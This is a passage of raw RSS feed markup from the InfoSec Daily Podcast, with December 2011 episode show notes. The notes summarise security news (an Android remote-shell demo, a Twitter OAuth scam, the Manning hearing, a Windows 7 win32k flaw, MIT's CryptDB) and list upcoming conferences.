<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security of Android devices has come under quite a lot of scrutiny in recent months, with researchers identifying various root exploits and permission leaks that could be exploited. In this video, researcher </span><a href="http://viaforensics.com/security/nopermission-android-app-remote-shell.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Thomas Cannon of ViaForensics</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> demonstrates a method for setting up a remote shell on an Android device without using any exploits or vulnerabilities. The method works on various versions of Android, up to and including Gingerbread.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter&lsquo;s list of trending topics appears to have been hit hard by another variant of the familiar &ldquo;see who unfollowed you&rdquo; scam:</span><img height="289px;" src="https://lh5.googleusercontent.com/xu2rGvLv2pnMe9y4izqUwau4EbdHahxZBBEkAyN4jJxNJxuoAXLuhw_7LYw7nepWwsAsRpbj9qJzwmWBM1oREN_rhp5eApBn2DLo_LySTc0SxbLYEOI" width="542px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Significant numbers of Tweets are being sent out that contain the above message: saying that a certain number of people have unfollowed them, and to find out who unfollowed you, click on the link. A few hashtags were generally attached to the end of the tweet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What happens when you click on the link? You are redirected to a page for a &ldquo;Followers Monitor&rdquo;, which leads eventually to a page asking you to authorize an application to use your Twitter account. This rogue application is able to carry out such &ldquo;minor&rdquo; operations as reading your tweets, updating your profile, and even posting tweets on your behalf. If you actually give the app access, of course, the first thing it will do is post its own version of the spammed Tweet.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A convicted computer hacker from California testified Tuesday in Pfc. Bradley Manning&#39;s preliminary hearing about six days of chats he conducted with someone who claimed to have leaked classified information and was &quot;looking to brag about what they had done.&quot;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adrian Lamo said he traded instant messages in a chat format with someone self-identified as Bradass87. Lamo testified that based on an e-mail he received from Manning, as well as an examination of Manning&#39;s Facebook page, that Bradass87 was Manning.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The testimony came on the fourth day of the preliminary hearing, which will determine if Manning proceeds to a full military court-martial.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Manning is accused of stealing and leaking more than a quarter of a million classified documents from the State Department and the Defense Department to the WikiLeaks website, the biggest intelligence leak in U.S. history.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Army Criminal Investigation Command Special Agent David Shaver later testified that the chat logs that Lamo provided to the Army largely matched chat logs found on Manning&#39;s computer in Iraq.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The prosecution did not ask Lamo any specific questions about the chats themselves, but did establish that he was diagnosed with Asperger&#39;s syndrome and takes medication for it. At one point he admitted overusing his medication to the point that his parents became concerned and he eventually was put in an involuntary psychiatric hold for three days.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://miguelalmeida.net/2011/12/what-will-change-in-security-in-2012.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://miguelalmeida.net/2011/12/what-will-change-in-security-in-2012.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What will change in security in 2012? &nbsp;In essence, in one word: nothing. The attacks will be essentially the same, although it is likely they&#39;ll become more sophisticated, and the defenses, in practice, will also be the same. Why? Because security is only strengthened when people are afraid. This is a fact. Fear. Fear for your life or the life of your relatives and friends, fear for the loss of financial assets, and fear for the loss of power and peer recognition. And despite the evolution of current threats and attacks, we&#39;ve not yet reached a level of chaos, widespread chaos, which would trigger those emotions. In 2012? No. Not yet. But I don&#39;t think we&#39;re improving our defenses substantially to avoid this scenario. Why? Because, oddly enough, we&#39;re not afraid to be afraid.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#444444;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/researchers-warn-new-windows-7-vulnerability-122011"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/researchers-warn-new-windows-7-vulnerability-122011</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a message on Twitter, a </span><a href="https://twitter.com/#%21/w3bd3vil/status/148454992989261824"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">researcher named w3bd3vil</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim&#39;s machine.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;A vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user&#39;s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large &quot;height&quot; attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,&quot; the </span><a href="https://secunia.com/advisories/47237/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Secunia advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft officials have not confirmed the vulnerability, but said that they&#39;re looking into it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://css.csail.mit.edu/cryptdb/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://css.csail.mit.edu/cryptdb/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For the last three decades or so, the big problem in using encryption hasn&rsquo;t been whether strongly encrypted files can be cracked. The problem remains that to actually do anything with encrypted data&mdash;search it, sort it, or perform computations with it&ndash;that data must be decrypted and exposed to prying eyes.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now the Google- and Citigroup-funded work of three MIT scientists holds the promise of solving that long-nagging issue in some of the computing world&rsquo;s most common applications. CryptDB, a piece of database software the researchers presented in a paper (</span><a href="http://people.csail.mit.edu/nickolai/papers/raluca-cryptdb.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PDF here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) at the Symposium on Operating System Principles in October, allows users to send queries to an encrypted set of data and get almost any answer they need from it without ever decrypting the stored information, a trick that keeps the info safe from hackers, accidental loss and even snooping administrators. And while it&rsquo;s not the first system to offer that kind of magically flexible cryptography, it may be the first practical one, taking a fraction of a second to produce an answer where other systems that perform the same encrypted functions would require thousands of years.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cryptographers have long sought to implement a system they call &ldquo;fully homomorphic encryption,&rdquo; in which a user can encrypt data into indecipherable strings of numbers, do math with those strings, and then decrypt the results to get the same answer he or she would have if the data hadn&rsquo;t been encrypted at all. That&rsquo;s a useful trick if you need to perform operations on health care or financial data in a situation like cloud computing, where the computer (or the IT administrator) doing the calculations can&rsquo;t always be trusted to access the private numbers being crunched. IBM cryptographer Craig Gentry compares the idea to &ldquo;one of those boxes with the gloves that are used to handle toxic chemicals,&rdquo; as he once put it. &ldquo;All the manipulation happens inside the box, and the chemicals are never exposed to the outside world.&rdquo;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-550-armitage-easy-android-shell-unfollow-manning-update-nothing-windows-7-0-day-mit-cryptdb/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3291/0/infosec-daily-podcast-episode-550.mp3" length="18680203" type="audio/mpeg" />
		<itunes:duration>0:38:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 550 for December 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://dl.packetstormsecurity.net/papers/general/Armitage-hacking_made_easy_Part-1.pdf
	&#8230;.
	Source: &#160;http://threatpost.com/en_us/blogs/gaining-remote-shell-android-122011
	The security of Android devices has come under quite a lot of scrutiny in recent months, with researchers identifying various root exploits and permission leaks that could be exploited. In this video, researcher Thomas Cannon of ViaForensics demonstrates a method for setting up a remote shell on an Android device without using any exploits or vulnerabilities. The method works on various versions of Android, up to and including Gingerbread.
	&#8230;.
	Source: &#160;http://blog.trendmicro.com/new-unfollowed-you-scam-hits-twitter-trending-topics
	Twitter&#8216;s list of trending topics appears to have been hit hard by another variant of the familiar &#8220;see who unfollowed you&#8221; scam:
	Significant numbers of Tweets are being sent out that contain the above message: saying that a certain number of people have unfollowed them, and to find out who unfollowed you, click on the link. A few hashtags were generally attached to the end of the tweet.
	What happens when you click on the link? You are redirected to a page for a &#8220;Followers Monitor&#8221;, which leads eventually to a page asking you to authorize an application to use your Twitter account. This rogue application is able to carry out such &#8220;minor&#8221; operations as reading your tweets, updating your profile, and even posting tweets on your behalf. If you actually give the app access, of course, the first thing it will do is post its own version of the spammed Tweet.
	&#8230;.
	Source: &#160;http://www.cnn.com/2011/12/20/us/bradley-manning-hearing/index.html
	A convicted computer hacker from California testified Tuesday in Pfc. Bradley Manning&#39;s preliminary hearing about six days of chats he conducte[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 549 &#8211; SOPA, Manning, Iowa, Lady Gaga &amp; China</title>
		<link>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china</link>
		<comments>http://www.isdpodcast.com/episode-549-sopa-manning-iowa-lady-gaga-china#comments</comments>
		<pubDate>Tue, 20 Dec 2011 02:04:36 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3287</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 549 for December 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 549 for December 19, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Beau Woods, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
